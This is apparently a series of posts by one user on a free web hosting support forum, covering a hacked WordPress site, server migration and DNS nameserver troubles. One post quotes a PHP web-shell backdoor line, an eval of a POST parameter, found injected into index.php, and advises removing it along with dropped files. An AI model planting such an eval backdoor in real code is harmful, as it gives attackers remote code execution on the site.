danval

Just checked another account and that one's also AnonymousFox'd...on two different WP installs.

 

There's something in common with the WP installations here that's causing this. Either it's WP itself, or you're all using the same compromised plugin (which I doubt).

Maybe a 0-day attack? I update Wordpress to 4.9.7 on 5th July.

I'll have Krydos look at this one too.

Thank you Wolstech.

Have had their cPanel password changed by the hacker.

This is the most strange thing. I can tell you that my password was very strong (mixed letters an numbers, and not a common word). So a reverse hash could be imposible.

It would be interesting to determine if those affected are only those who have a Wordpress installed.

I notice the problem yesterday (Friday 20th at 14:53PM CEST) because Wordfence mailed me about an unexpected administrator login.

Other account that was compromised was raqbul (belongs to a member of my family) at the same time.

Wordpress is well known for severe security issues and is laughably easy to compromise

Yes, this CMS is a headache. I had Wordpress up to date, and they still managed to attack it with success.

If you don't have a backup, the best option is:

1. Do a fresh install.
2. Install the Wordfence plugin. It's free and can help you in this cases.
3. Up to date regularly: plugins, themes and core.
4. Do regularly backups.

This is the best option to fight against attacks, although they will continue to happen. And some of them with success

Anyway, this surely it is due to a hole in Wordpress, but how have they managed to change the cPanel password? This is the most frustrating thing I that I found so far...

In "index.php", remove this code at the start of file:

<?php eval($_POST['475454656']); ?>

The "php.ini" must be deleted because not belongs to Wordpress.

I think these are the only changes that were made, but the best solution is restore a recent full backup of site (files and database) if you have one.

Also, this don't prevent from the hack will happend again in the future, because it's neccesary to known where is the security hole...

.

Yes, the 'AnonymousFox' was the same administrator user rename as mine.

I have installed Wordfence on my Wordpress site. Thanks to the plugin I found out that an suspicious administrator login was made.

I have done and scan from Wordfence, and I have the Wordpress installation modified:

New file: wp-admin/2125719357.php

New file: wp-content/1205929475.php

New file: wp-admin/php.ini

Modified file: index.php

Hi,

The same thing was start happening to me yersteday. I have a Wordpress site on Tommy and I couldn't login either cPanel or Wordpress administration.

After reset my password, I could login to cPanel. I checked Wordpress database and I discovered that the admin user login was renamed and password changed. These changes were not made from me, so I think the site was been hacked (and so my cPanel account).

I though this was only my problem, but a family member who has a Wordpress blog on HelioHost too, suffered the same problem. The Wordpress admin user was renamed to the same login as mine and access to cPanel was not possible. Then, we had to reset the cPanel password to fix it.

Anyone has the same problem?

Best Regards,

Yes, I manage to restore the website and all it's working again.

Many thanks for you support Krydos

I use EU.ORG, and in the past, I had problems setting nameservers in this domain provider. Because this I have an A record.

As you say, I have changed the values of NS record to ns1.heliohost.org and ns2.heliohost.org, and delete A record. Time to wait for replication.

Thank you again for your invaluable help.

Thank you Krydos!

I have two questions:

1. I've noticed that my forum username has changed to "danval2". Is it possible rename it to "danval"?
2. In the DNS configuration for my domain, I have an A record pointing to 216.218.192.170. I think this IP was Stevie log time ago, although now it have another IP (65.19.143.2). Since this server is down, I changed the A record for my domain to point to Tommy (65.19.143.6). Is this correct?

Best regards.

Hello,

Because the current problems with Stevie, I must migrate my account to Tommy.

I sent you a donation and received the invitation email to Tommy. But before I create an account in this server, an admin must delete my account on Stevie, right?

This is my account info:

• Username: danval
• Domain: cerberolabs.es.eu.org
• Server: stevie
• Transaction ID: 0J528184E4869705K

I'll transfer user, domain, email, database and files to this new account (I have a recent backup).

On the other hand, at my home there is another person who also had a blog hosted on Stevie. This person don't have PayPal account. If I make another donation, could you send the invitation to Tommy to a different email than the transaction (I'll specify it in transaction message)?

Thank you so much.

Best regards.

Thank you Krydos. Everything is running ok now.

Hi,

My database is also invisible on phpMyAdmin.

User: danval

Database: danval_wordpress

Thanks,

Great! Thank you Byron

Hi,

One person at my home would like to create a personal blog and I recommend this host server to her because I am very comfortable with the service.

I have an account on HelioHost and I know about the account policy, but I don't know if accesing from same computer/network will be detected as violating terms of service with a duplicate account.

Are there any problem with this situation? Can she create an account on HelioHost?

I think I remember reading something long ago in the forum/faq/wiki about this situation, but I can't find it now.

I just check the site now, and it works (and FTP too).

I don't know what was the cause of the issue, but it works fine now.

You can mark this topic as solved or close it.

Hi,

When I try to access my website I get a timeout error from browser. I'm getting this error since two days ago (at least, since I know it).

I have the same problems with FTP (216.218.192.170:21). However, I can log in cPanel and access to phpMyAdmin to backup the SQL database.

Are there any known issues with stevie? Could you help me?

My website is cerberolabs[dot]es[dot]eu[dot]org and my username is danval.

Thanks,

It works! Should be a matter about DNS propagation. In the end I did not use CloudFlare because EntryDNS works.

Now I got the site online again, though it's a pain that I lost the domain under heliohost.org

Thank you very much!

hussam, I've done the steps in your proposal, but still not working. Now I get the Account Queued page from HelioHost.

I had created an account on another FreeDNS (EntryDNS) to register the domain at EU.org (it's mandatory to have an authoritative nameservers).

Now I created this records in this account:

***.es.eu.org (NS) -&--#62; ns1.entrydns.net
***.es.eu.org (NS) -&--#62; ns2.entrydns.net
***.es.eu.org (NS) -&--#62; ns3.entrydns.net
***.es.eu.org (A) -&--#62; 216.218.192.170

Are the same that you have?

I will try a CloudFlare account also and I let you know if it works.

Many thanks for the information wolstech.

The last question: I submit a new domain change to recover my old domain at heliohost (***.heliohost.org) using this script. Should I do anything else? The cPanel shows me the correct domain, but I can't access my site yet. Also the NS1 answer a 'not found' when queried about that domain. I guess that I must wait about 48 hours until it updates.

Ah, ok. Thank you.

Are there any plans to make it work as name server? Without NS2 I can't use this domain because the nameservers check and two servers are needed at least...

Hi,

I had created a domain under EU.org, and I would like to use it with my Heliohost account. To accomplish this, I follow the instructions on this topic: http://www.helionet....g-euorg-domain/ but no success.

Instead, I used the script to change my main domain on Heliohost (http://www.heliohost.../scripts/domain) to EU.org domain. Apparently all was correct, I wait some time to changes were applied, and check in cPanel that my domain is set correctly.

However, when I set the nameservers on EU.org domain, I received the following errors:

---- Servers and domain names check
Getting IP for NS1.HELIOHOST.ORG: 65.19.143.3
Getting IP for NS2.HELIOHOST.ORG: 64.62.211.133
---- Checking SOA & NS records for ***.es.eu.org
SOA from NS1.HELIOHOST.ORG at 65.19.143.3: serial 2014080501
SOA from NS2.HELIOHOST.ORG at 64.62.211.133: Error: [Errno 32] Broken pipe
NS from NS1.HELIOHOST.ORG at 65.19.143.3: ok
NS from NS2.HELIOHOST.ORG at 64.62.211.133: Error: [Errno 32] Broken pipe
2 errors(s)

It seems that there is an error with nameserver ns2.heliohost.org.

I tried to use nslookup, and running DNS queries against this nameserver are not working:

&--#62; server ns2.heliohost.org
Servidor predeterminado:  ns2.heliohost.org
Address:  64.62.211.133
&--#62; heliohost.org
Servidor:  ns2.heliohost.org
Address:  64.62.211.133
*** ns2.heliohost.org no encuentra heliohost.org: No response from server

However with ns1.heliohost.org, it works:

&--#62; server ns1.heliohost.org
Servidor predeterminado:  ns1.heliohost.org
Address:  65.19.143.3
&--#62; heliohost.org
Servidor:  ns1.heliohost.org
Address:  65.19.143.3
Nombre:  heliohost.org
Address:  64.62.211.132

Are there any problem with ns2.heliohost.org?

----------------------

cPanel username: danval

Domain: ***.heliohost.org (old) / ***.eu.es.org (new)

Server: Steve

Same here. I can't sign in cPanel from HelioHost. It leads me to a new login screen (maybe Johnny's?). Reset password don't send any mail to my inbox.

Also I have an IMAP client to read mail, but it shows a message "bad user/password" when try to synchronize mails.

I can access to cPanel if I sign in from my subdomain with port 2082 (i.e. http://cerbero.heliohost.org:2082/).

All of this happens to me from 4 hours ago.

danval

cerbero.heliohost.org

Stevie